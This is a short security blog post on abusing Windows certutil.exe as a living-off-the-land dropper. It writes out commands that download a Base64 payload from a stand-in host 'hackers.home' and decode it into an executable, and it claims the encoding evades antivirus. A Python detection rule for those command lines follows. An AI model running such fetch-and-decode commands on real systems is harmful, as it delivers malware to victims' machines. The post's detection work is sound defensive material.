Every Windows installation has a built-in dropper. It simply has to be used.

April 5, 2018

Dropper and Windows – attack pattern

One of the basic attack patterns assumes that the victim will download and execute a dropper (software that installs additional software without user intervention), which in turn downloads the actual malicious code. It turns out that a standard Windows installation already contains a built-in tool, certutil.exe, which can effectively be used as an untraceable dropper. The designed purpose of certutil.exe is displaying and managing certificates and keys. This seemingly simple utility has, however, a very rich set of command-line parameters, and among other things it accepts a URL as a parameter.

Windows dropper in practice

Imagine the following attack:

C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt

This downloads a malicious Base64-encoded file from the Internet (the encoding usually allows the download to bypass antivirus and proxy protections).

C:\Temp>certutil.exe -decode bad.txt bad.exe

The file is decoded back into executable form.

As a result, all that remains is to execute the malicious code on the victim's computer and take full control of it.
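A detection rule for the two-step pattern shown above, added here as an example (it is not code from the original post or from the Internet Storm Center): it classifies process-creation command lines, such as the CommandLine field of Sysmon Event ID 1 or Security event 4688, and flags certutil invocations that fetch a URL or decode a file. The sample events are constructed, and the grouping of switches into "download" and "decode" is this example's own choice.

```python
import re
from typing import Optional

# Switches from the post (-urlcache, -decode) plus a few other real certutil
# switches treated the same way; grouping them as "download" / "decode" is
# this example's own choice, not an official taxonomy.
DOWNLOAD_SWITCHES = {"urlcache", "verifyctl"}
DECODE_SWITCHES = {"decode", "decodehex", "encode"}
URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

# Constructed sample CommandLine values (e.g. Sysmon Event ID 1 / Security 4688).
SAMPLE_EVENTS = [
    'certutil.exe -urlcache -split -f “https://hackers.home/badcontent.txt” bad.txt',
    "certutil.exe -decode bad.txt bad.exe",
    'C:\\Windows\\System32\\certutil.exe /decode "C:\\Users\\Public\\in.txt" out.exe',
    "certutil.exe -dump",                 # benign: list the local certificate store
    "powershell.exe -Command Get-Date",   # unrelated process
]

def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping quoted spans whole.
    Curly quotes (as pasted from reports) are normalised to straight quotes."""
    cleaned = cmdline.replace("\u201c", '"').replace("\u201d", '"')
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cleaned)]

def classify_certutil(cmdline: str) -> Optional[str]:
    """Return 'download', 'decode' or None for one process-creation command line."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    image = tokens[0].rsplit("\\", 1)[-1].lower()   # strip any directory prefix
    if image not in ("certutil.exe", "certutil"):
        return None
    # certutil accepts both "-" and "/" as switch prefixes; compare case-insensitively
    switches = {t[1:].lower() for t in tokens[1:] if t and t[0] in "-/"}
    has_url = any(URL_RE.match(t) for t in tokens[1:])
    if switches & DOWNLOAD_SWITCHES or has_url:
        return "download"
    if switches & DECODE_SWITCHES:
        return "decode"
    return None

def triage(events: list[str]) -> list[tuple[str, str]]:
    """Run the rule over a batch of command lines and return (verdict, cmdline) hits."""
    hits = []
    for cmdline in events:
        verdict = classify_certutil(cmdline)
        if verdict:
            hits.append((verdict, cmdline))
    return hits
```

Matching on the image name alone misses a copied or renamed certutil binary, so in Sysmon data also compare the OriginalFileName field (or the file hash) rather than relying on the path.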

Source: Internet Storm Center


Published by: Piotr Mierzwiński
